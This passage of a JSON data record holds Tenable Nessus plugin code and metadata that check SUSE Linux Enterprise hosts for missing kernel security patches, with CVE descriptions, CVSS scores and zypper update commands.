attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971628\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971947\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972003\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972844\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972951\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973855\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974308\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977582\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=977685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982698\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983318\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983394\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984456\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9717/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8845/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2143/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2185/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2186/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2188/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2782/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2847/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3136/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3137/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3138/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3139/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3140/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3156/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3672/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3689/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3951/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4482/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4486/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4569/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4578/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5244/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161690-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c76d1249\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-1001=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-1001=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-1001=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2016-1001=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2016-1001=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-1001=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.60-52.49.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.60-52.49.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:52:32", "description": "The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various security and bugfixes.\n\nNotable changes in this kernel :\n\n - It is now possible to mount a NFS export on the exporting host directly.\n\nThe following security bugs were fixed :\n\n - CVE-2016-5244: A kernel information leak in rds_inc_info_copy was fixed that could leak kernel stack memory to userspace (bsc#983213).\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower file system does not allow it. This could have lead to local privilege escalation when ecryptfs-utils was installed and /sbin/mount.ecryptfs_private was setuid (bsc#983143).\n\n - CVE-2016-4913: The get_rock_ridge_filename function in fs/isofs/rock.c in the Linux kernel mishandles NM (aka alternate name) entries containing \\0 characters, which allowed local users to obtain sensitive information from kernel memory or possibly have unspecified other impact via a crafted isofs filesystem (bnc#980725).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in net/x25/x25_facilities.c in the Linux kernel did not properly initialize a certain data structure, which allowed attackers to obtain sensitive information from kernel stack memory via an X.25 Call Request (bnc#981267).\n\n - CVE-2016-4805: Use-after-free vulnerability in drivers/net/ppp/ppp_generic.c in the Linux kernel allowed local users to cause a denial of service (memory corruption and system crash, or spinlock) or possibly have unspecified other impact by removing a network namespace, related to the ppp_register_net_channel and ppp_unregister_channel functions (bnc#980371).\n\n - CVE-2016-0758: Tags with indefinite length could have corrupted pointers in asn1_find_indefinite_length (bsc#979867).\n\n - CVE-2016-2187: The gtco_probe function in drivers/input/tablet/gtco.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971944).\n\n - CVE-2016-4482: The proc_connectinfo function in drivers/usb/core/devio.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via a crafted USBDEVFS_CONNECTINFO ioctl call (bnc#978401).\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in the Linux kernel allowed attackers to cause a denial of service (panic) via an ASN.1 BER file that lacks a public key, leading to mishandling by the public_key_verify_signature function in crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel incorrectly relies on the write system call, which allowed local users to cause a denial of service (kernel memory write operation) or possibly have unspecified other impact via a uAPI interface (bnc#979548).\n\n - CVE-2016-4485: The llc_cmsg_rcv function in net/llc/af_llc.c in the Linux kernel did not initialize a certain data structure, which allowed attackers to obtain sensitive information from kernel stack memory by reading a message (bnc#978821).\n\n - CVE-2016-4578: sound/core/timer.c in the Linux kernel did not initialize certain r1 data structures, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface, related to the (1) snd_timer_user_ccallback and (2) snd_timer_user_tinterrupt functions (bnc#979879).\n\n - CVE-2016-4569: The snd_timer_user_params function in sound/core/timer.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface (bnc#979213).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in net/core/rtnetlink.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory by reading a Netlink message (bnc#978822).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not validate certain offset fields, which allowed local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not limit the amount of unread data in pipes, which allowed local users to cause a denial of service (memory consumption) by creating many pipes with non-default sizes (bnc#970948).\n\n - CVE-2016-2188: The iowarrior_probe function in drivers/usb/misc/iowarrior.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970956).\n\n - CVE-2016-3138: The acm_probe function in drivers/usb/class/cdc-acm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both a control and a data endpoint descriptor (bnc#970911).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both an interrupt-in and an interrupt-out endpoint descriptor, related to the cypress_generic_port_probe and cypress_open functions (bnc#970970).\n\n - CVE-2016-3140: The digi_port_init function in drivers/usb/serial/digi_acceleport.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970892).\n\n - CVE-2016-2186: The powermate_probe function in drivers/input/misc/powermate.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970958).\n\n - CVE-2016-2185: The ati_remote2_probe function in drivers/input/misc/ati_remote2.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971124).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux kernel mishandles destruction of device objects, which allowed guest OS users to cause a denial of service (host OS networking outage) by arranging for a large number of IP addresses (bnc#971360).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in sound/usb/quirks.c in the snd-usb-audio driver in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference or double free, and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-3139: The wacom_probe function in drivers/input/tablet/wacom_sys.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970909).\n\n - CVE-2016-2143: The fork implementation in the Linux kernel on s390 platforms mishandles the case of four page-table levels, which allowed local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted application, related to arch/s390/include/asm/mmu_context.h and arch/s390/include/asm/pgalloc.h (bnc#970504).\n\n - CVE-2016-2782: The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint (bnc#968670).\n\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in the Linux kernel did not properly maintain a hub-interface data structure, which allowed physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device (bnc#968010).\n\n - CVE-2015-7566: The clie_5_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacked a bulk-out endpoint (bnc#961512).\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : kernel (SUSE-SU-2016:1672-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-8816", "CVE-2016-0758", "CVE-2016-1583", "CVE-2016-2053", "CVE-2016-2143", "CVE-2016-2184", "CVE-2016-2185", "CVE-2016-2186", "CVE-2016-2187", "CVE-2016-2188", "CVE-2016-2782", "CVE-2016-2847", "CVE-2016-3134", "CVE-2016-3137", "CVE-2016-3138", "CVE-2016-3139", "CVE-2016-3140", "CVE-2016-3156", "CVE-2016-4482", "CVE-2016-4485", "CVE-2016-4486", "CVE-2016-4565", "CVE-2016-4569", "CVE-2016-4578", "CVE-2016-4580", "CVE-2016-4805", "CVE-2016-4913", "CVE-2016-5244"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-trace", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-1672-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93164", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1672-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93164);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-7566\", \"CVE-2015-8816\", \"CVE-2016-0758\", \"CVE-2016-1583\", \"CVE-2016-2053\", \"CVE-2016-2143\", \"CVE-2016-2184\", \"CVE-2016-2185\", \"CVE-2016-2186\", \"CVE-2016-2187\", \"CVE-2016-2188\", \"CVE-2016-2782\", \"CVE-2016-2847\", \"CVE-2016-3134\", \"CVE-2016-3137\", \"CVE-2016-3138\", \"CVE-2016-3139\", \"CVE-2016-3140\", \"CVE-2016-3156\", \"CVE-2016-4482\", \"CVE-2016-4485\", \"CVE-2016-4486\", \"CVE-2016-4565\", \"CVE-2016-4569\", \"CVE-2016-4578\", \"CVE-2016-4580\", \"CVE-2016-4805\", \"CVE-2016-4913\", \"CVE-2016-5244\");\n\n script_name(english:\"SUSE SLES11 Security Update : kernel (SUSE-SU-2016:1672-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\nsecurity and bugfixes.\n\nNotable changes in this kernel :\n\n - It is now possible to mount a NFS export on the\n exporting host directly.\n\nThe following security bugs were fixed :\n\n - CVE-2016-5244: A kernel information leak in\n rds_inc_info_copy was fixed that could leak kernel stack\n memory to userspace (bsc#983213).\n\n - 